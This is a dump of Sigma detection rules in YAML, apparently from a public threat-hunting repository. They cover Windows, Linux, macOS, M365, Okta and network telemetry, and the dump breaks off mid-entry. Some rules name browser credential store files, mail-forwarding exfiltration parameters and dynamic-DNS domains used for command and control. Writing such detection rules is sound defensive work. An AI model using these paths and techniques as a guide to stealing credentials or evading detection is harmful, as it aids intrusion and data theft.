    "content": "title: Interactive Logon to Server Systems\nid: 3ff152b2-1388-4984-9cd9-a323323fdadf\nstatus: test\ndescription: Detects interactive console logons to Server Systems\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-17\nmodified: 2023-12-15\ntags:\n    - attack.lateral-movement\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1078\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID:\n            - 528\n            - 529\n            - 4624\n            - 4625\n        LogonType: 2\n        ComputerName|expand:\n            - '%ServerSystems%'\n            - '%DomainControllers%'\n    filter_main_advapi:\n        LogonProcessName: 'Advapi'\n        ComputerName|expand: '%Workstations%'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Administrative activity via KVM or ILO board\nlevel: medium\n"
  },
  {
    "path": "rules-placeholder/windows/dns_query/dns_query_win_wscript_cscript_resolution.yml",
    "content": "title: DNS Request From Windows Script Host\nid: 12310575-e8b1-475c-a976-57ed540b349c\nstatus: test\ndescription: |\n    Detects unusual domain resolutions originating from CScript/WScript that can identify malicious javascript files executing in an environment, often as a result from a phishing or watering hole attack.\nauthor: Josh Nickels, Marius Rothenbücher\nreferences:\n    - Internal Research\ndate: 2024-09-06\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        Image|endswith:\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n        QueryName|contains: '.' # Ensures that lookups are for external hosts\n    filter_main_internal_domains: # Populate this placeholder with known and expected internal domains\n        QueryName|expand: '%internal_domains%'\n    filter_optional_trusted_domains: # Mostly certificate distribution domains\n        - QueryName:\n              - 'crl.starfieldtech.com'\n              - 'ocsp.usertrust.com'\n              - 'officecdn.microsoft.com'\n              - 'oneocsp.microsoft.com'\n              - 'oscp.comodoca.com'\n              - 'oscp.sectigo.com'\n              - 'oscp.starfieldtech.com'\n              - 'www.python.org'\n        - QueryName|endswith:\n              - '.digicert.com'\n              - '.entrust.net'\n              - '.globalsign.net'\n              - '.verisign.com'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Script files making expected domain requests\nlevel: low\n"
  },
  {
    "path": "rules-placeholder/windows/network_connection/net_connection_win_susp_rdp_from_domain_controller.yml",
    "content": "title: New RDP Connection Initiated From Domain Controller\nid: fda34293-718e-4b36-b018-38caab0d1209\nstatus: test\ndescription: Detects an RDP connection originating from a domain controller.\nreferences:\n    - Internal Research\nauthor: Josh Nickels\ndate: 2024-05-10\ntags:\n    - attack.lateral-movement\n    - attack.t1021\nlogsource:\n    product: windows\n    category: network_connection\ndetection:\n    selection_connection:\n        Initiated: 'True'\n        DestinationPort: 3389\n    selection_hosts:\n        Computer|expand: '%domain_controller_hostnames%'\n    filter_optional_defender_identity:\n        Image|endswith: '\\Microsoft.Tri.Sensor.exe' # Microsoft Defender for Identity service makes port 3389 connections to hosts\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Legitimate administration activity\nlevel: high\n"
  },
  {
    "path": "rules-placeholder/windows/process_creation/proc_creation_win_userdomain_variable_enumeration.yml",
    "content": "title: Userdomain Variable Enumeration\nid: 43311e65-84d8-42a5-b3d4-c94d9b67038f\nstatus: test\ndescription: Detects suspicious enumeration of the domain the user is associated with.\nreferences:\n    - https://www.arxiv-vanity.com/papers/2008.04676/\n    - https://thedfirreport.com/2022/11/14/bumblebee-zeros-in-on-meterpreter/\nauthor: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io'\ndate: 2023-02-09\nmodified: 2024-08-01\ntags:\n    - attack.discovery\n    - attack.t1016\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: 'echo '\n        CommandLine|contains|expand: '%userdomain%'\n    condition: selection\nfalsepositives:\n    - Certain scripts or applications may leverage this.\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/README.md",
    "content": "TBD"
  },
  {
    "path": "rules-threat-hunting/cloud/m365/audit/microsoft365_susp_email_forwarding_activity.yml",
    "content": "title: Mail Forwarding/Redirecting Activity In O365\nid: c726e007-2cd0-4a55-abfb-79730fbedee5\nstatus: test\ndescription: Detects email forwarding or redirecting activity in O365 Audit logs.\nreferences:\n    - https://redcanary.com/blog/email-forwarding-rules/\n    - https://github.com/PwC-IR/Business-Email-Compromise-Guide/blob/fe29ce06aef842efe4eb448c26bbe822bf5b895d/PwC-Business_Email_Compromise-Guide.pdf\nauthor: RedCanary Team (idea), Harjot Singh @cyb3rjy0t\ndate: 2023-10-11\nmodified: 2024-11-17\ntags:\n    - attack.collection\n    - attack.t1114.003\n    - attack.defense-evasion\n    - attack.t1564.008\n    - attack.exfiltration\n    - attack.t1020\n    - detection.threat-hunting\nlogsource:\n    service: audit\n    product: m365\n    definition: \"Requirements: The 'OperationProperties' and 'Parameters' fields are a list of dict. A correct mapping to the 'Value' field inside is recommended to avoid greedy search\"\ndetection:\n    # Note: Might require seperation in the future when enough data is gatherd\n    selection_updateinbox:\n        Operation|contains: 'UpdateInboxRules'\n        OperationProperties|contains:\n            - 'Forward'\n            - 'Recipients'\n    selection_setmailbox:\n        Operation|contains: 'Set-Mailbox'\n        Parameters|contains:\n            - 'ForwardingSmtpAddress'\n            - 'ForwardingAddress'\n    selection_setinbox:\n        Operation|contains:\n            - 'New-InboxRule'\n            - 'Set-InboxRule'\n        Parameters|contains:\n            - 'ForwardAsAttachmentTo'\n            - 'ForwardingAddress'\n            - 'ForwardingSmtpAddress'\n            - 'ForwardTo'\n            - 'RedirectTo'\n            - 'RedirectToRecipients'\n    condition: 1 of selection_*\nfalsepositives:\n    - False positives are expected from legitimate mail forwarding rules. You need organisation specific knowledge. Filter out the domains that are allowed as forwarding targets as well as any additional metadata that you can use for exclusion from trusted sources/targets in order to promote this to a potential detection rule.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/cloud/m365/audit/microsoft365_susp_inbox_rule_creation_or_update_activity.yml",
    "content": "title: Inbox Rules Creation Or Update Activity in O365\nid: d3577be1-42c9-44a7-b56e-2e8de97349d3\nstatus: experimental\ndescription: |\n    Detects inbox rule creation or update via O365 Audit logs, a technique commonly observed in Business Email Compromise (BEC) attacks to hide emails.\n    The usage of inbox rules can be a sign of a compromised mailbox, where an attacker is attempting to evade detections by suppressing or redirecting incoming emails.\n    Analysts should review these rules in context, validate whether they reflect normal user behavior, and correlate with other indicators such as unusual login activity or recent mailbox rule modifications.\nreferences:\n    - https://redcanary.com/threat-detection-report/techniques/email-hiding-rules/\n    - https://learn.microsoft.com/it-it/powershell/module/exchangepowershell/set-inboxrule?view=exchange-ps\n    - https://learn.microsoft.com/it-it/powershell/module/exchangepowershell/new-inboxrule?view=exchange-ps\nauthor: Marco Pedrinazzi (@pedrinazziM) (InTheCyber)\ndate: 2026-01-09\ntags:\n    - attack.defense-evasion\n    - attack.t1564.008\n    - attack.exfiltration\n    - attack.collection\n    - attack.t1114.003\n    - detection.threat-hunting\nlogsource:\n    service: audit\n    product: m365\n    definition: \"Requirements: The 'Parameters' field is a list of dict. A correct mapping to the 'Value' field inside is recommended to avoid greedy search\"\ndetection:\n    selection:\n        Operation:\n            - 'New-InboxRule'\n            - 'Set-InboxRule'\n        Parameters|contains:\n            - 'DeleteMessage'\n            - 'MarkAsRead'\n            - 'MoveToFolder'\n            - 'SubjectOrBodyContainsWords'\n    condition: selection\nfalsepositives:\n    - Legitimate inbox rules created by users or administrators to manage email flow such as filtering, organizing, or automating email handling.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/cloud/okta/okta_password_health_report_query.yml",
    "content": "title: Okta Password Health Report Query\nid: 0d58814b-1660-4d31-8c93-d1086ed24cba\nstatus: test\ndescription: |\n    Detects all activities against the endpoint \"/reports/password-health/*\" which should only be accessed via OKTA Admin Console UI.\n    Use this rule to hunt for potential suspicious requests. Correlate this event with \"admin console\" login and alert on requests without any corresponding admin console login\nreferences:\n    - https://www.beyondtrust.com/blog/entry/okta-support-unit-breach\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2023-10-25\ntags:\n    - attack.credential-access\n    - detection.threat-hunting\nlogsource:\n    service: okta\n    product: okta\ndetection:\n    selection:\n        debugContext.debugData.requestUri|contains: '/reports/password-health/'\n    condition: selection\nfalsepositives:\n    - OKTA Admin Activites via Web Console UI.\n    - This rule is recommended to be used for threat hunting, especially in the context of OKTA support incident in OCT-2023.\n    - This rule can be used to hunt the activity against endpoints like /reports/password-health/async_csv_download_schedule?, which are typically used from Okta Admin Console UI only, without any corresponding admin console login. See reference\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/linux/file/file_event/file_event_lnx_python_path_configuration_files.yml",
    "content": "title: Python Path Configuration File Creation - Linux\nid: fb96c26c-9f85-4ae7-af0d-ed1ed1f1f5ce\nrelated:\n    - id: e3652ba3-0ad8-4010-a957-b7ba369e7bac # Windows\n      type: similar\n    - id: 4f394635-13ef-4599-b677-3353e0f84f55 # MacOS\n      type: similar\nstatus: test\ndescription: |\n    Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.\n    Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.\n    Default paths are '\\lib\\site-packages\\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).\nreferences:\n    - https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/\n    - https://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac\n    - https://docs.python.org/3/library/site.html\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2024-04-25\ntags:\n    - attack.execution\n    - attack.t1059.006\n    - detection.threat-hunting\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|re: '(?i)/lib/python3\\.([5-9]|[0-9]{2})/site-packages/' # Unix and macOS\n        TargetFilename|endswith: '.pth'\n    condition: selection\nfalsepositives:\n    - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/linux/file/file_event/file_event_lnx_susp_long_filename_pattern.yml",
    "content": "title: Potentially Suspicious Long Filename Pattern - Linux\nid: 11629c4d-0fe6-465b-be62-b39a1c442aad\nstatus: experimental\ndescription: |\n    Detects the creation of files with unusually long filenames (100 or more characters), which may indicate obfuscation techniques used by malware such as VShell.\n    This is a hunting rule to identify potential threats that use long filenames to evade detection. Keep in mind that on a legitimate system, such long filenames can and are common. Run this detection in the context of threat hunting rather than alerting.\n    Adjust the threshold of filename length as needed based on your environment.\nreferences:\n    - https://www.trellix.com/blogs/research/the-silent-fileless-threat-of-vshell/\nauthor: '@kostastsale'\ndate: 2025-11-22\ntags:\n    - attack.execution\n    - attack.t1059.004\n    - attack.defense-evasion\n    - attack.t1027\n    - detection.threat-hunting\nlogsource:\n    product: linux\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|re: '[^/]{100,}$'\n    filter_optional_known_good:\n        TargetFilename|startswith:\n            - '/run/systemd/units/invocation:systemd-fsck@'\n            - '/sys/firmware/'\n            - '/var/log/journal/'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate files with long filenames.\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/linux/process_creation/proc_creation_lnx_susp_process_termination_via_kill.yml",
    "content": "title: Terminate Linux Process Via Kill\nid: 64c41342-6b27-523b-5d3f-c265f3efcdb3\nstatus: test\ndescription: Detects usage of command line tools such as \"kill\", \"pkill\" or \"killall\" to terminate or signal a running process.\nreferences:\n    - https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html\n    - https://www.cyberciti.biz/faq/how-force-kill-process-linux/\n    - https://www.geeksforgeeks.org/how-to-kill-processes-on-the-linux-desktop-with-xkill/\nauthor: Tuan Le (NCSGroup)\ndate: 2023-03-16\nmodified: 2024-12-12\ntags:\n    - attack.defense-evasion\n    - attack.t1562\n    - detection.threat-hunting\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '/kill'\n            - '/killall'\n            - '/pkill'\n            - '/xkill'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/linux/process_creation/proc_creation_lnx_susp_running_process_discovery.yml",
    "content": "title: Process Discovery\nid: 4e2f5868-08d4-413d-899f-dc2f1508627b\nstatus: stable\ndescription: |\n  Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.\n  Information obtained could be used to gain an understanding of common software/applications running on systems within the network\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md\n    - https://www.cyberciti.biz/faq/show-all-running-processes-in-linux/\nauthor: Ömer Günal, oscd.community, CheraaghiMilad\ndate: 2020-10-06\nmodified: 2022-07-07\ntags:\n    - attack.discovery\n    - attack.t1057\n    - detection.threat-hunting\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '/atop'\n            - '/htop'\n            - '/pgrep'\n            - '/ps'\n            - '/pstree'\n            - '/top'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/macos/file/file_event/file_event_macos_python_path_configuration_files.yml",
    "content": "title: Python Path Configuration File Creation - MacOS\nid: 4f394635-13ef-4599-b677-3353e0f84f55\nrelated:\n    - id: e3652ba3-0ad8-4010-a957-b7ba369e7bac # Windows\n      type: similar\n    - id: fb96c26c-9f85-4ae7-af0d-ed1ed1f1f5ce # Linux\n      type: similar\nstatus: test\ndescription: |\n    Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.\n    Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.\n    Default paths are '\\lib\\site-packages\\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).\nreferences:\n    - https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/\n    - https://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac\n    - https://docs.python.org/3/library/site.html\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2024-04-25\ntags:\n    - attack.execution\n    - attack.t1059.006\n    - detection.threat-hunting\nlogsource:\n    product: macos\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|re: '(?i)/lib/python3\\.([5-9]|[0-9]{2})/site-packages/' # Unix and macOS\n        TargetFilename|endswith: '.pth'\n    condition: selection\nfalsepositives:\n    - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification.\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/macos/process_creation/proc_creation_macos_pbpaste_execution.yml",
    "content": "title: Clipboard Data Collection Via Pbpaste\nid: d8af0da1-2959-40f9-a3e4-37a6aa1228b7\nstatus: test\ndescription: |\n    Detects execution of the \"pbpaste\" utility, which retrieves the contents of the clipboard (a.k.a. pasteboard) and writes them to the standard output (stdout).\n    The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands.\n    It can also be used in shell scripts that may require clipboard content as input.\n    Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information.\n    Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content.\nreferences:\n    - https://www.loobins.io/binaries/pbpaste/\n    - https://medium.com/@NullByteWht/hacking-macos-how-to-dump-1password-keepassx-lastpass-passwords-in-plaintext-723c5b1c311b\n    - https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF\nauthor: Daniel Cortez\ndate: 2024-07-30\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.t1115\n    - detection.threat-hunting\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/pbpaste'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/network/net_dns_low_reputation_etld.yml",
    "content": "title: Low Reputation Effective Top-Level Domain (eTLD)\nid: cf5ee356-65c4-4556-8d11-6977fcdfed4b\nstatus: experimental\ndescription: Detects DNS queries to domains within known low reputation eTLDs. This rule uses AlphaSOC's threat intelligence data and is updated on a monthly basis.\nreferences:\n    - https://feeds.alphasoc.net/bad-etlds.txt\nauthor: Norbert Jaśniewicz (AlphaSOC)\ndate: 2025-08-04\ntags:\n    - attack.command-and-control\n    - attack.t1071.004\n    - attack.initial-access\n    - detection.threat-hunting\nlogsource:\n    category: dns\ndetection:\n    selection:\n        query|endswith:\n            - '.duckdns.org'\n            - '.top'\n            - '.ddns.net'\n            - '.gl.at.ply.gg'\n            - '.portmap.io'\n            - '.icu'\n            - '.zapto.org'\n            - '.live'\n            - '.hopto.org'\n            - '.portmap.host'\n            - '.sbs'\n            - '.sytes.net'\n            - '.click'\n            - '.ydns.eu'\n            - '.site'\n            - '.cloud'\n            - '.no-ip.org'\n            - '.kozow.com'\n            - '.lat'\n            - '.pro'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/web/proxy_generic/proxy_susp_class_extension_request.yml",
    "content": "title: .Class Extension URI Ending Request\nid: 53c15703-b04c-42bb-9055-1937ddfb3392\nstatus: test\ndescription: |\n    Detects requests to URI ending with the \".class\" extension in proxy logs.\n    This could rules can be used to hunt for potential downloads of Java classes as seen for example in Log4shell exploitation attacks against Log4j.\nreferences:\n    - https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/\nauthor: Andreas Hunkeler (@Karneades)\ndate: 2021-12-21\nmodified: 2024-02-26\ntags:\n    - attack.initial-access\n    - detection.threat-hunting\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri|endswith: '.class'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/builtin/appxdeployment_server/win_appxpackaging_server_successful_package_installation.yml",
    "content": "title: Successful MSIX/AppX Package Installation\nid: 289dfa9e-e378-4a56-a9d4-7ed5ee218029\nstatus: experimental\ndescription: |\n    Detects successful MSIX/AppX package installations on Windows systems by monitoring EventID 854 in the Microsoft-Windows-AppXDeployment-Server/Operational log.\n    While most installations are legitimate, this can help identify unauthorized or suspicious package installations.\n    It is crucial to monitor such events as threat actors may exploit MSIX/AppX packages to deliver and execute malicious payloads.\nreferences:\n    - https://www.splunk.com/en_us/blog/security/msix-weaponization-threat-detection-splunk.html\nauthor: Michael Haag, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-03\ntags:\n    - attack.execution\n    - attack.t1204.002\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    service: appxdeployment-server\ndetection:\n    selection:\n        EventID: 854\n    condition: selection\nfalsepositives:\n    - Legitimate MSIX/AppX package installations\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/builtin/firewall_as/win_firewall_as_change_rule.yml",
    "content": "title: Firewall Rule Modified In The Windows Firewall Exception List\nid: 5570c4d9-8fdd-4622-965b-403a5a101aa0\nstatus: test\ndescription: Detects when a rule has been modified in the Windows firewall exception list\nreferences:\n    - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)\nauthor: frack113\ndate: 2022-02-19\nmodified: 2024-01-22\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    service: firewall-as\ndetection:\n    selection:\n        EventID:\n            - 2005 # A rule has been modified in the Windows Defender Firewall exception list (Windows 10)\n            - 2073 # A rule has been modified in the Windows Defender Firewall exception list. (Windows 11)\n    filter_optional_teams:\n        ApplicationPath|endswith: '\\AppData\\local\\microsoft\\teams\\current\\teams.exe'\n    filter_optional_keybase:\n        ApplicationPath|endswith: '\\AppData\\Local\\Keybase\\keybase.exe'\n    filter_optional_messenger:\n        ApplicationPath|endswith: '\\AppData\\Local\\Programs\\Messenger\\Messenger.exe'\n    filter_optional_opera:\n        ApplicationPath|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\Programs\\Opera\\'\n            - '\\opera.exe'\n    filter_optional_brave:\n        ApplicationPath|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\Local\\BraveSoftware\\Brave-Browser\\Application\\brave.exe'\n    condition: selection and not 1 of filter_optional_*\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/builtin/security/account_management/win_security_scrcons_remote_wmi_scripteventconsumer.yml",
    "content": "title: Potential Remote WMI ActiveScriptEventConsumers Activity\nid: 9599c180-e3a8-4743-8f92-7fb96d3be648\nstatus: test\ndescription: |\n    Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network.\n    This event is best correlated and used as an enrichment to determine the potential lateral movement activity.\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-09-02\nmodified: 2024-09-02\ntags:\n    - attack.lateral-movement\n    - attack.privilege-escalation\n    - detection.threat-hunting\n    - attack.persistence\n    - attack.t1546.003\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4624\n        LogonType: 3\n        ProcessName|endswith: 'scrcons.exe'\n    filter_main_local_system:\n        TargetLogonId: '0x3e7' # Local System\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - SCCM\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/builtin/security/win_security_file_access_browser_credential.yml",
    "content": "title: Access To Browser Credential Files By Uncommon Applications - Security\nid: 4b60e527-ec73-4b47-8cb3-f02ad927ca65\nrelated:\n    - id: 91cb43db-302a-47e3-b3c8-7ede481e27bf\n      type: similar\nstatus: test\ndescription: |\n    Detects file access requests to browser credential stores by uncommon processes. Could indicate potential attempt of credential stealing This rule requires heavy baselining before usage.\nreferences:\n    - https://ipurple.team/2024/09/10/browser-stored-credentials/\nauthor: Daniel Koifman (@Koifsec), Nasreddine Bencherchali\ndate: 2024-10-21\ntags:\n    - attack.credential-access\n    - attack.t1555.003\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit File System subcategory must be enabled. Additionally, each listed ObjectName must have \"List folder/read data\" auditing enabled.'\ndetection:\n    selection_eid:\n        EventID: 4663\n        ObjectType: 'File'\n        # Note: This AccessMask requires enhancements. As this access can be combined with other requests. It should include all possible outcomes where READ access and similar are part of it.\n        AccessMask: '0x1'\n    selection_browser_chromium:\n        ObjectName|contains:\n            - '\\User Data\\Default\\Login Data'\n            - '\\User Data\\Local State'\n            - '\\User Data\\Default\\Network\\Cookies'\n    selection_browser_firefox:\n        FileName|endswith:\n            - '\\cookies.sqlite'\n            - '\\places.sqlite'\n            - 'release\\key3.db'  # Firefox\n            - 'release\\key4.db'  # Firefox\n            - 'release\\logins.json' # Firefox\n    filter_main_system:\n        ProcessName: System\n    filter_main_generic:\n        # This filter is added to avoid large amount of FP with 3rd party software. You should remove this in favour of specific filter per-application\n        ProcessName|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\system32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    filter_optional_defender:\n        ProcessName|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\'\n        ProcessName|endswith:\n            - '\\MpCopyAccelerator.exe'\n            - '\\MsMpEng.exe'\n    condition: selection_eid and 1 of selection_browser_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/builtin/security/win_security_scheduled_task_deletion.yml",
    "content": "title: Scheduled Task Deletion\nid: 4f86b304-3e02-40e3-aa5d-e88a167c9617\nstatus: test\ndescription: Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \\TASKNAME\nreferences:\n    - https://twitter.com/matthewdunwoody/status/1352356685982146562\n    - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699\nauthor: David Strassegger, Tim Shelton\ndate: 2021-01-22\nmodified: 2023-01-20\ntags:\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.persistence\n    - car.2013-08-001\n    - attack.t1053.005\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data.'\ndetection:\n    selection:\n        EventID: 4699\n    filter_main_generic:\n        TaskName: '\\Microsoft\\Windows\\RemovalTools\\MRT_ERROR_HB' # Triggered by ParentCommandLine=C:\\WINDOWS\\system32\\MRT.exe /EHB /HeartbeatFailure ErrorStack,Previous=ErrorStack,Previous=ErrorStack,Previous=ErrorStack,Previous=ErrorStack,Previous=SubmitHeartbeatReportData,Hr=0x80072f8f,Hr=0x80072f8f,Hr=0x80072f8f,Hr=0x80072f8f,Hr=0x80072f8f /HeartbeatError 0x80072f8f\n    filter_main_firefox:\n        TaskName|contains: '\\Mozilla\\Firefox Default Browser Agent ' # Triggered by firefox updates\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Software installation\nlevel: low\n"
  },
  {
    "path": "rules-threat-hunting/windows/create_remote_thread/create_remote_thread_win_loadlibrary.yml",
    "content": "title: CreateRemoteThread API and LoadLibrary\nid: 052ec6f6-1adc-41e6-907a-f1c813478bee\nstatus: test\ndescription: Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/180719-DLLProcessInjectionCreateRemoteThread/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-08-11\nmodified: 2024-01-22\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055.001\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        StartModule|endswith: '\\kernel32.dll'\n        StartFunction: 'LoadLibraryA'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/create_remote_thread/create_remote_thread_win_powershell_generic.yml",
    "content": "title: Remote Thread Creation Via PowerShell\nid: eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50\nrelated:\n    - id: 99b97608-3e21-4bfe-8217-2a127c396a0e\n      type: derived\nstatus: test\ndescription: Detects the creation of a remote thread from a Powershell process to another process\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-06\nmodified: 2023-11-10\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        SourceImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n    filter_main_compattelrunner:\n        SourceParentImage|endswith: ':\\Windows\\System32\\CompatTelRunner.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/create_remote_thread/create_remote_thread_win_susp_target_shell_application.yml",
    "content": "title: Remote Thread Created In Shell Application\nid: a9d4d3fa-8fc0-41bc-80b1-30b9fda79d6f\nstatus: test\ndescription: |\n    Detects remote thread creation in command shell applications, such as \"Cmd.EXE\" and \"PowerShell.EXE\".\n    It is a common technique used by malware, such as IcedID, to inject malicious code and execute it within legitimate processes.\nreferences:\n    - https://research.splunk.com/endpoint/10399c1e-f51e-11eb-b920-acde48001122/\n    - https://www.binarydefense.com/resources/blog/icedid-gziploader-analysis/\nauthor: Splunk Research Team\ndate: 2024-07-29\nmodified: 2025-07-04\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\n    - detection.threat-hunting\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        TargetImage|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n    filter_main_system:\n        SourceImage|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n    filter_optional_defender:\n        SourceImage|endswith: '\\MsMpEng.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-threat-hunting/windows/file/file_access/file_access_win_browsers_chromium_sensitive_files.yml",
